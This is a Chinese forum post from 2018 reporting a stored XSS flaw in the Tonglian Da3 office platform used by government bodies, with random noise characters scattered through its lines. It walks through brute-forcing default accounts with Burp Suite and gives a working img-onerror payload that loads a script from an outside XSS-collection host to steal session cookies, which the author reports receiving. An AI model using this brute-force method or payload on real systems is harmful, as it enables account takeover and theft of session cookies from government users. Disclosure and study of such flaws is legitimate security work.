3 T6 Z# |4 ], s# I3 F
- [" E6 N' O" L. x9 u1 S) O
同联Da3协同办公平台后台通用储存型xss漏洞5 F7 Q$ t% w) Q7 d6 O* c
1 R2 r7 r! B4 |: {- i1 U
+ D$ r" ?8 Q/ K6 O 平台简介:
! q* \% k: L5 S J0 n& d6 d' ?
% g6 _' x h1 I2 e
9 K1 C4 C Y, C" Q: s! h, t% V
; S" l3 j' [+ C' ]+ c5 ^& Z$ |
6 q# o+ Q" c! m1 {4 h2 n
8 o9 v' L8 g/ j 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
/ M7 t1 Q" R6 p' g0 _同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
# P. z% I+ n2 k2 P6 L. Y3 P
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!$ p5 Q8 ~% [9 R7 W
. G( ]8 H: l2 h1 j# `9 i5 G$ L2 d/ Q
5 k* U4 {% ?- g& [+ Q8 O
$ o" s' `9 ~, ]* S7 ?
% @. t _$ J9 n) k2 y$ u$ K* A
9 |$ l" J: p5 x 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
( j) W q8 W) U# V& K, ~
3 U( a# Q; Z5 b% _6 t- C " ^ |4 g0 f+ B& I4 b8 R& r6 J
6 R; H0 T \! T$ `# c
( _5 s1 ?* t8 Y4 v
% G* G7 r, o5 b( P
http://1.1.1.1:7197/cap-aco/#(案例2-)% f. P/ j! f8 n5 I
) }2 L6 v. V. N- x
+ r0 N& U3 W: \ http://www.XXOO.com (案例1-官网网站)
! N. F6 C& E0 W2 P$ l
q5 G G# {7 d* u/ C) e" o
$ s3 M& S2 t) U0 D
漏洞详情:
$ J7 y1 r' R2 S; i
8 ]: l; v4 n& G {/ a5 B5 q- J
. l" b3 @7 [5 C; `. ] 案例一、
) |! c9 {. [6 S7 `! Y8 j4 x
- v+ [# k) l. C' ~. g 1 S, f( Z0 O% t$ R, n
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试" h3 V. M) N& N2 C# J; K' Z& y
g& x7 @5 }# k% m: P& O9 q . ~. j& d, G& n) O! B4 O( c
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
$ u5 A' c' b+ ~$ `
$ H/ p% F6 z0 `2 [3 x
$ u; `8 M6 u: O# |7 N$ i
! \3 `: p5 B! r. Q/ O
7 O8 W8 @/ J( |# |" d2 p 4 [' \' B" d5 ~/ q$ |& a, R7 t
7 S: B2 t" w9 Z7 }; l4 V$ ? g
+ {; {+ m: `! [/ I 6 c6 j" k0 l0 |+ J: M) A6 O! i
status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图: 9 f5 b( n: O9 u% G- K& x2 C% P" O1 L
: O7 A( y, T/ a! M5 P
/ @0 u/ c7 w$ ]) m2 h
( I+ n C$ n/ K9 P' D" I
+ b( d% X3 L; i0 q9 e8 b; \
, K- D7 @6 g7 } 
( O+ A6 s7 O0 {1 ~: N2 ]0 `
' u1 u! j# g8 K) Z& S
/ y- x" |' V* n* P, ^* t
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
: ]! H) h8 X4 m. v8 H& V- F
. b g3 N9 Z _% o( S- x
& G2 B3 e" y; D; I
; @# T% [. c* j5 q. B0 o
; y* t9 Y m! F# {! S. K
. |' C& r% c0 l$ L! ? <img src=x: T+ ~3 S& l7 P% ~. y6 }: U9 ~
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图: r1 U3 n0 `/ b; e
* k! A5 a# [4 S2 q
- s. p5 }$ D' S# }) Y* @, N
' J1 S3 V2 U1 M6 s) O
6 d8 U6 q5 v* b+ i+ j* O : p* j: q& @- v V
然后发送,接收cookie如图: 5 O- a' a: ` u) l/ x
3 ~- K8 I0 M$ D, n 0 b! _+ E2 l/ P/ `) a
1 c! W8 j% m# N+ u- c1 I
" |+ n. x: R; @; |$ R
1 k+ s* r/ G: _# j# d/ M
6 ?6 d' A: u& u9 A4 i
5 _6 y- m; `# {
2 `; Z/ Q5 n6 R+ U2 ^& E8 F
7 h0 `6 f' T A) d4 @, p
1 i0 H- [: ~* V, h
2 X, F9 H2 H9 X% a* H# S , @6 {' o3 q! W+ N
& I' V0 U# t/ n% D* J4 _
7 l2 q% O) t7 m 
i- T' K+ Z) {# L" h
& l1 ~7 n) w1 D i/ T( ?4 k1 L c1 ]0 s2 N+ t! l6 n4 y
/ X/ B3 b/ p6 H1 \8 q
( f. y, O ?( \& C5 T; n! a
8 w C% }7 @7 a& @. H5 ~
+ M+ B' B/ D/ a% X. O
' c" w2 q1 g/ x
& k4 ^2 h& [3 S0 h7 L 案例2、
O. e7 l: F5 U; n
0 O* u+ X5 E- { 6 g' P2 A: B* k1 c+ [
前面步骤都一样,下面看效果图: / \1 K5 b, Y2 b4 u }& S
- h) g+ v& \# R4 D; [8 }" Y# t7 r
) v6 [+ V" u2 h3 }7 Q$ F! X" s
1 I5 ?' t. G& Z0 o% h6 _
# `2 y, R" f; N / z8 q0 \- @4 M2 w6 ^
6 k' V5 O0 w+ Y+ y
( \2 {# A- K% [+ Y
1 N/ N' e, s0 P, Q0 I. Y$ e
. U# P3 f9 i$ s. n4 V$ H1 c
, d; \4 {0 e( {# z, a
, R7 h% O/ C' E9 U& _
( u$ I5 B7 \( M' O; \+ v
: I- D9 F. W& r0 D9 _ Q1 |
* R1 O: p0 S/ e5 ?* G* [
1 ~* x, b7 I+ e3 O' E+ w
0 _8 u: h* \5 n$ M; h) ]
( p" ?6 T! U0 L! e; Q 2 p! w2 Y7 v$ S* }+ m" ~* c
+ T ~* R) w& s! A- ?: A' l
2 D4 c. A% y* Y: C( j" L ' v1 U* B) P$ W" w
1 P) f" x8 ]* c: f. H" j # Y( O, R( l1 }# i# W9 p
2 q! p1 d% j# H( [
% F( q0 B% C0 R% x4 Y6 h ! m0 }6 S# P( u6 p' t' `+ Q
3 B8 R- W5 C1 k* `; ]
( x% K- B/ t. m: E 
发表于 2018-10-20 20:14:15
收藏
支持
反对